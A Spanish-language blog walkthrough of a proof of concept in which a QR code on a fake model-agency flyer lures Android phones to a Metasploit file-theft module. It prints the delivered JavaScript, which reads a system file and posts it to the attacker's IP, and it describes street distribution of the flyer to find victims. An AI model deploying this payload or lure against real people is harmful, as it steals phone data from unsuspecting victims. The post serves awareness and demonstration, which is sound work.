Buenas a todos, hace varias semanas, en concreto una antes del congreso No cON Name, mientras estaba preparándolo con Pablo, un amigo me enviaba por Twitter el siguiente artículo, en el que explicaban como mediante un sencillo código QR con una URL que redireccionaba un terminal móvil (con Android) a una IP y un Puerto donde se encontraba Metasploit escuchando, era posible recuperar información del móvil. Cómo me resultó curiosa la idea me dispuse a realizar una PoC.

Es curioso pensar que gracias a la tecnología actual con una simple hoja de papel (que contendrá el código QR) es posible hackear un terminal para obtener datos del mismo. Esto abre la puerta a los ingenieros sociales, que pueden utilizar todo tipo de tretas para, por ejemplo, conseguir información de móviles de menores, o en el caso de hoy, dándole un poco de humor al asunto, de chicas guapas (para demostrar lo que no se debe hacer, guiño guiño =)).

Todo lo que veréis a continuación es una prueba de concepto realizada en un entorno controlado en local.

En primer lugar necesitaremos una herramienta que nos genere un código QR, tenéis muchas por Internet. A continuación generaréis un código QR que contenga la dirección IP de la máquina donde dejaréis escuchando metasploit por el puerto 80, en mi caso como estoy en una intranet, la 192.168.1.23.

En segundo lugar deberéis escribir en un folio un texto de gancho (Ingeniería Social en su máximo esplendor), para conseguir que las víctimas piquen el anzuelo, y utilicen su terminal móvil con Android para leer el código QR del folio. En nuestro caso, me he inventado una supuesta agencia de modelos que busca azafatas para un congreso :)

Como dato curioso, algunas aplicaciones móviles que decodifican códigos QR, no preguntan tras leer códigos que contienen una URL, si el usuario desea acceder a ellas realmente, y te redirigen directamente al Sitio Web, este es el caso de la aplicación ScanLife, que facilita aún más nuestra estrategia para conseguir que la victima visite nuestra IP.

A continuación os dejo una imagen con mi documento:

El siguiente paso será montar Metasploit para que quede escuchando en la IP 192.168.1.23 por el puerto 80, con el exploit para Android del que hablábamos. Para ello yo he utilizado una VM con Backtrack 5 R1.

Una vez lanzada la distro, ejecutaremos Metasploit desde una shell:

Ahora cargaremos el módulo de Android con el que lanzaremos el ataque y le indicamos que queremos robar el siguiente archivo del móvil (si queréis lanzar otro tipo de ataque podéis ver las distintas opciones con el comando “show options”:

Indicamos al módulo que queremos que la víctima sea redirigida directamente a la raíz del servidor:

Y al puerto 80 (si no lo modificamos, por defecto está configurado en el 8080):

Ya solo nos falta arrancar el servidor con el exploit y esperar a una víctima:

Ahora toca realizar ingeniería social, repartiendo por las calles el panfleto de nuestra Agencia de Modelos Flu, buscando víctimas a las que robar sus datos.

Yo he sacrificado para la PoC mi HTC Desire, y he escaneado el código QR, en mi caso (como debería de ser en todas las APP que escaneen QR, aunque haya herramientas como ScanLife que se lo pasan por el forro) me preguntó el móvil antes de redireccionarme a la página sobre si quería realmente abrir el Sitio Web.

Tras aceptar la redirección, en el móvil pude ver una página Web totalmente blanca, cuya URL contenía gran cantidad de símbolos alfanuméricos. Me dispuse a editar el contenido del HTML con un editor que tengo en Android, y pude ver el siguiente código:

<html>
<body>
<script lang=javascript>
var target_files = Array('system/etc/hosts');
var results = new Array();
function addField(form, name, value) {
var hf = document.createElement('input');
hf.setAttribute('type', 'hidden');
hf.setAttribute('name', name);
hf.setAttribute('value', value);
form.appendChild(hf);
}
function uploadFiles(files) {
var form = document.createElement('form');
form.setAttribute('method', 'POST');
form.setAttribute('action', 'http://192.168.1.23:80/q');
var i = 0;
for (var fn in files) {
addField(form, 'f'+i, btoa(fn));
addField(form, 'd'+i, files[fn]);
i += 1;
}
document.body.appendChild(form);
form.submit();
}
for (var fn in target_files) {
fn = target_files[fn];
xh = new XMLHttpRequest();
xh.open('GET', fn, false);
xh.onreadystatechange = function() { if (xh.readyState == 4) { results[fn] = btoa(xh.responseText); } }
xh.send();
}
uploadFiles(results);
</script>
</body>
</html>

Si nos vamos ahora a la consola de Metasploit podremos ver como todo ha funcionado correctamente y ya he logrado obtener la información del móvil:

¿Creo que a partir de ahora os pensaréis dos veces antes de escanear un código QR desde el móvil verdad? }=P Últimamente veo mucho por el metro de Madrid, anuncios por las paredes de una conocida cadena de radio donde se publicitan mediante códigos QR, ¿será una estrategia para espiar las noticias que vamos a publicar en nuestros blogs? o eso solo ocurre en rtve… ;)

Saludos!

Related Posts Plugin for WordPress, Blogger...